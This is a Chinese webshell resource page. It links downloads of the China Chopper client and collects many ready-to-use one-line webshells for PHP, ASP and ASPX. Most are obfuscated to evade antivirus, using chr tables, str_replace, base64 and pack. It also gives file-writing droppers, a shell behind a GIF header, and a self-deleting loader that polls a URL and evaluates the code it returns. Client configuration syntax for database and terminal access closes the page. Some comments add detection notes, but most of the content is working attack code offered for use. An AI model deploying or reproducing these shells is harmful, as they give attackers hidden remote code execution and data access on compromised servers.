最新中国菜刀下载,免杀菜刀一句话大全.


中国菜刀下载,基于原版中国菜刀优化版20160309.

下载地址:

http://download.csdn.net/detail/settoken/9457567

http://pan.baidu.com/s/1jHoJxHW

China chopper

http://pan.baidu.com/s/1eRxEYjC


Asp

<%
' Classic ASP (VBScript) sample: runs an OS command by abusing the XSLT script
' extension of MSXML. Nothing is read from the request here; the command is the
' fixed text "cmd /c dir" inside <root>.
' Detection: a .asp file that combines MSXML2.DOMDocument, an msxsl:script
' element and wscript.shell has no ordinary templating purpose; on the host,
' look for the web server worker process spawning cmd.exe.
set xmldoc= Server.CreateObject("MSXML2.DOMDocument")
xml="<?xml version=""1.0""?><root >cmd /c dir</root>"
xmldoc.loadxml(xml)
Set xsldoc = Server.CreateObject("MSXML2.DOMDocument")
' The stylesheet embeds a JScript function (prefix zcg) that creates
' wscript.shell, executes its argument and returns stdout followed by stderr.
' The template for /root passes the node text to that function.
xlst="<?xml version='1.0'?><xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh""><msxsl:script language=""JScript"" implements-prefix=""zcg""> function xml(x) {var a=new ActiveXObject('wscript.shell'); var exec=a.Exec(x);return exec.StdOut.ReadAll()+exec.StdErr.ReadAll(); }</msxsl:script><xsl:template match=""/root""> <xsl:value-of select=""zcg:xml(string(.))""/></xsl:template></xsl:stylesheet>"
xsldoc.loadxml(xlst)
' TransformNode is the call that triggers the embedded script; its result is
' written into the page between <pre><xmp> tags.
' NOTE(review): MSXML exposes an AllowXsltScript property for turning stylesheet
' script off - confirm its default for the MSXML version actually deployed.
response.write "<pre><xmp>" & xmldoc.TransformNode(xsldoc)& "</xmp></pre>"
%>


Php
 <?php
// Reaches code evaluation through the XSLT "php:function" extension instead of
// a direct call. The <root> text is the string assert($_POST[a]); and the
// stylesheet hands that string to assert(), so the request field "a" ends up
// evaluated as PHP code.
// String evaluation by assert() was deprecated in PHP 7.2 and removed in 8.0.
$xml='<root>assert($_POST[a]);</root>';
$xsl='<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:zcg="http://php.net/xsl">
 <xsl:template match="/root">
    <xsl:value-of select="zcg:function(\'assert\',string(.))"/>
 </xsl:template>
</xsl:stylesheet>';
$xmldoc = DOMDocument::loadXML($xml);
$xsldoc = DOMDocument::loadXML($xsl);
$proc = new XSLTProcessor();
// registerPHPFunctions() with no argument exposes every PHP function to the
// stylesheet. Legitimate code should pass an explicit allowlist of function
// names; a bare call in a file that also binds the http://php.net/xsl
// namespace is worth flagging in code review and file scanning.
$proc->registerPHPFunctions();
$proc->importStyleSheet($xsldoc);
// The transform result is discarded; the side effect of the callback is the point.
$proc->transformToXML($xmldoc);
?> 


Aspx
<%@page language="C#"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Xml"%>
<%@ import Namespace="System.Xml.Xsl"%>
<%
// ASP.NET (C#) sample: evaluates request-supplied code through an XSLT script
// block. The JScript function in the CDATA section of the stylesheet reads the
// request item "a", passes it to eval(..., 'unsafe') and then ends the response.
// The XML input ("test") only exists to make the /root template fire.
// Detection: msxsl:script together with HttpContext.Current and eval inside an
// .aspx file, and any use of XsltSettings.TrustedXslt with an inline stylesheet.
string xml=@"<?xml version=""1.0""?><root>test</root>";
string xslt=@"<?xml version='1.0'?>
<xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
<msxsl:script language=""JScript"" implements-prefix=""zcg"">
<msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
<msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
<msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
<msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
<![CDATA[function xml() {var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;var Server=c.Server;eval(Request.Item['a'],'unsafe');Response.End();}]]>
</msxsl:script>
<xsl:template match=""/root"">
<xsl:value-of select=""zcg:xml()""/>
</xsl:template>
</xsl:stylesheet>";
XmlDocument xmldoc=new XmlDocument();
xmldoc.LoadXml(xml);
XmlDocument xsldoc=new XmlDocument();
xsldoc.LoadXml(xslt);
XslCompiledTransform xct=new XslCompiledTransform();
// XsltSettings.TrustedXslt is what allows msxsl:script to run. Code that loads
// a stylesheet it does not fully control should use XsltSettings.Default,
// which leaves both script blocks and document() disabled.
xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());
// Output goes to a throwaway MemoryStream; nothing is rendered from the transform itself.
xct.Transform(xmldoc,null,new MemoryStream());


%>


一句话:
PHP: <?php @eval($_POST['settoken']);?>


ASP: <%eval request("settoken")%>


ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["settoken"],"unsafe");%>


******************************************
<?php eval(base64_decode($_POST[index]))?>
<O>index=ZXZhbCgkX1BPU1RbMF0pOw==</O>
0
<?php fputs(fopen('./settoken.php','w+'),'<?php eval(base64_decode($_POST[index]))?>');?>


<?php 
// Obfuscated loader: no sensitive function name appears as a literal.
// Detection: literal-name signatures miss this file. Flag str_replace() results
// that are later used as callables, chains of variable-function calls, and
// base64 text split across several variables; decode before judging.
$sme="JrGluZm89rJF9QT1NUW2r9w";
$wd="ZW5pbmZvXTrtlY2hvIGVr";
$ova="2YWwoJGlrurZm8pO2Vr";
// Removing "ej" from the padded string yields the name str_replace.
$xul = str_replace("ej","","stejrej_ejrejeejplaejceje");
$axc="jraG8grIjQwNCBOb3QgRm91bmQiOw==";
// Removing "z" yields base64_decode.
$ay = $xul("z", "", "zbzazszez64z_zdzecozde");
// Removing "h" yields create_function (deprecated in PHP 7.2, removed in 8.0).
$ao = $xul("h","","hchrehahtheh_hfuhnhchthihohn");
// The four fragments are joined, stripped of "r", base64-decoded and used as
// the body of an anonymous function, which is invoked immediately.
$tik = $ao('', $ay($xul("r", "", $sme.$wd.$ova.$axc))); $tik();
$=$=openinfo
?>


<?php
// chr()-table obfuscation. range(1,200) makes $webscan[i] equal i+1, so the
// six chr() calls on the first line spell "assert" and the five inside ${...}
// on the second spell "_POST". The call passes one POST field to that function.
// Detection: a variable-function call whose argument is a variable-variable
// (${...}) built from chr() is not something ordinary application code does.
// String evaluation by assert() was removed in PHP 8.0.
$webscan=range(1,200);$webscan360=chr($webscan[96]).chr($webscan[114]).chr($webscan[114]).chr($webscan[100]).chr($webscan[113]).chr($webscan[115]);
$webscan360(${chr($webscan[94]).chr($webscan[79]).chr($webscan[78]).chr($webscan[82]).chr($webscan[83])}[chr($webscan[51])]);
$=$=4
?>


<?php $info=$_POST[info];echo eval($info);echo "404 Not Found"; ?>


<?php @preg_replace("//e",$_POST["Access"],"Access Denied"); ?>


<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[index];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>


<?php preg_replace("/^/e",base64_decode($_REQUEST[page]),0); ?>
settoken.php?page=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ==


<?php fputs(fopen(base64_decode("bG9ncy5waHA="), "w"), base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyd0aGlzX2lzX3lpanVodWEnXSk7Pz4="));?>
logs.php
this_is_yijuhua


<?php
// Character-index obfuscation: offsets 0,3,3,1,2,4 of 'aerst' spell "assert",
// so the name never appears as a literal. The {n} string-offset syntax used
// here was deprecated in PHP 7.4 and removed in PHP 8.0.
$str = 'aerst';
$funct = $str{0}.$str{3}.$str{3}.$str{1}.$str{2}.$str{4};
// Variable-function call on the POST field funC; the leading @ suppresses any
// error output, so failures leave nothing in the response.
@$func($_POST['funC']);
?>


<script language="php">@eval($_POST['p'.'h'.'p'])</script>


<?php
// pack("c6", ...) turns the six byte values into the string "assert", again
// avoiding a literal function name.
$func=pack("c6",97,115,115,101,114,116);
// Overwrites the POST field c with its base64-decoded form.
$_POST['c']=base64_decode( $_POST['c']) ;
// Variable-function call with the POST field 404 as its argument.
// Detection: a pack()/chr() result used as a callable on a request superglobal.
$func($_POST['404']);
?>






<?php
// Prints a fake "404 Not Found." body so the page looks missing to a visitor.
// The script sets no status code, so the HTTP status is presumably still 200;
// a "not found" body served with a success status is a useful log/proxy signal.
echo "404 Not Found.";
// When the POST field echo_Chr_Get is non-empty, the POST field z0 is
// base64-decoded and interpolated into a string that is passed to eval().
// Detection: POST bodies carrying a z0 parameter with base64 content, and
// eval() on a string built from request data.
$__Chr__ = $_POST['echo_Chr_Get']; if ($__Chr__!="") { $echo_Chr_Get__=base64_decode($_POST['z0']); @eval("\$echo = $echo_Chr_Get__;"); } ?>


<?php
// Fake "not found" body; no status code is set by this script.
echo "404 Not Found.";
// Same chr()-table technique as the $webscan sample earlier on the page:
// range(1,200) makes $Temp[i] equal i+1, the first chr() chain spells "assert"
// and the chain inside ${...} spells "_POST". One POST field is passed to it.
// Detection: variable-function call on a variable-variable built from chr().
$Temp=range(1,200);$Log=chr($Temp[96]).chr($Temp[114]).chr($Temp[114]).chr($Temp[100]).chr($Temp[113]).chr($Temp[115]);
$Log(${chr($Temp[94]).chr($Temp[79]).chr($Temp[78]).chr($Temp[82]).chr($Temp[83])}[chr($Temp[114])]);
$=$=s
?>


<?php
// Code injection through eval(): the GET parameter "arg" is interpolated,
// unvalidated, into a PHP statement that is then evaluated. Unlike the POST
// samples on this page, the input travels in the query string and therefore
// shows up in ordinary access logs.
// Fix for real code with this shape: never build eval() input from request
// data; parse the value and assign it directly.


$var = "var";


if (isset($_GET["arg"]))


{


$arg = $_GET["arg"];


// Request data becomes part of the evaluated source text here.
eval("\$var = $arg;");


echo "\$var =".$var;


}


?>
?arg=phpinfo()
?arg=fputs(fopen('page.php','w+'),'<?php%20eval($_POST[page])?>')


<?php 
   // Arbitrary file disclosure: the GET parameter "path" is used as-is both in
   // a response header and as the argument to readfile(), so any file the PHP
   // process can read is returned as a download.
   // Fix for real download handlers: map an identifier to a file inside one
   // fixed directory, reject anything else, and never echo request input into
   // a header value.
   header("Content-Type: application/octet-stream");
   header("Content-Disposition: attachment; filename=".$_GET['path']);
readfile($_GET['path']);
?>
?path=config.php


<?php include 'log.log';?>


<!--#include file="log.log"-->




file_put_contents('log.php','<?php eval($_POST[page])?>'); eval.txt
<?php
// Self-deleting polling loader. The script removes its own file, keeps running
// after the client disconnects, lifts the execution time limit, and then
// fetches a URL every 5 seconds and evaluates whatever text comes back.
// Detection: no file remains on disk, so look at the process instead - a PHP
// worker that never finishes and makes periodic outbound HTTP requests.
// Mitigation: allow_url_fopen=Off stops file_get_contents() on http URLs;
// egress filtering from web servers and a worker time limit enforced outside
// PHP cover the rest.
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);


$remote_file = 'http://localhost:8080/eval.txt';
// The loop ends only when the fetch returns an empty or false result.
while($code = file_get_contents($remote_file)){
  @eval($code);
  sleep(5);
};
?>




******************************************
<%eval e%>
<%e=request(page)%>
<!--#include file="settoken.asp"-->


<%MYTEST=REquEst("page"):EvaL(MYTEST)%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%>
<%Y=request("x")%> <%execute(Y)%>
<!-- Page++ -->
<%
' Classic ASP: the request parameter "page" is copied through two variables
' and then passed to eval. The extra assignment changes nothing functionally;
' it only separates request() from eval in the source text.
' Detection: trace data flow rather than matching "eval request" on one line.
dim x1,x2
x1 = request("page")
x2 = x1
eval x2
%>
<!-- Page++ -->
<%configconfigconfig=REqUEsT(chr(97))%>
<%eVAL configconfigconfig%>
gif89a;gifok<%Page=request("index")%><%eval Page%>gif89a;






数据库:


A)  数据库方面:
-----------------------------------------------------------------------------
PHP脚本:
<T>MYSQL</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
<H>localhost<H> 主机地址可为机器名或IP地址,如localhost
<U>root</U> 连接数据库的用户名,如root
<P>settoken</P> 连接数据库的密码,如12345




<L>utf8</L> 这一项数据库类型为MYSQL脚本为PHP时可选,不填则为latin1




ASP和ASP.NET脚本:
<T>类型</T> 类型只能填ADO
<C>ADO配置信息</C>
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=settoken;
同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件




Customize 脚本:
<T>类型</T> 类型只能填XDB
<X>与Customize 脚本约定的配置信息</X>
菜刀自带的Customize.jsp数据库参数填写方法如下(两行):
MSSQL:
<X>
com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=settoken
</X>
MYSQL:
<X>
com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=settoken
</X>
ORACLE:
<X>
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:user/password@127.0.0.1:1521/test
</X>




B) 其它方面:
-----------------------------------------------------------------------------
添加额外附加提交的数据,如ASP的新服务端是这样的:
<%
' Classic ASP: creates a ScriptControl COM object, sets its language to
' VBScript, loads source code taken from the request parameter "SC", and then
' runs the procedure "ff" from that code, handing it the ASP intrinsic objects.
' No eval/execute keyword appears in the file, so keyword signatures miss it.
' Detection: Server.CreateObject("ScriptControl") combined with addcode on
' request data; a large SC parameter in request logs.
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SC"))
o.run "ff",Server,Response,Request,Application,Session,Error
%>
那么,菜刀在配置处填入:
<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
然后以密码pass来连接即可。




提交功能前先POST额外的数据包:会话期间只提交一次。
<POST>https://zhongguocaidao/cgi-bin/login.cgi</POST>
<DATA>uid=user1&pwd=123456</DATA>




默认终端程序路径设置示例:
<SHELL>/bin/sh</SHELL>




虚拟终端默认命令设置示例:
<CMD>whoami</CMD>




文件管理默认打开的目录设置示例:
<CD>c:\windows\temp\</CD>




  3)  HTTP登录验证
SHELL地址这样填 http://user:pass@maicaidao.com/server.asp
用户名密码中的特殊字符可用URL编码转换.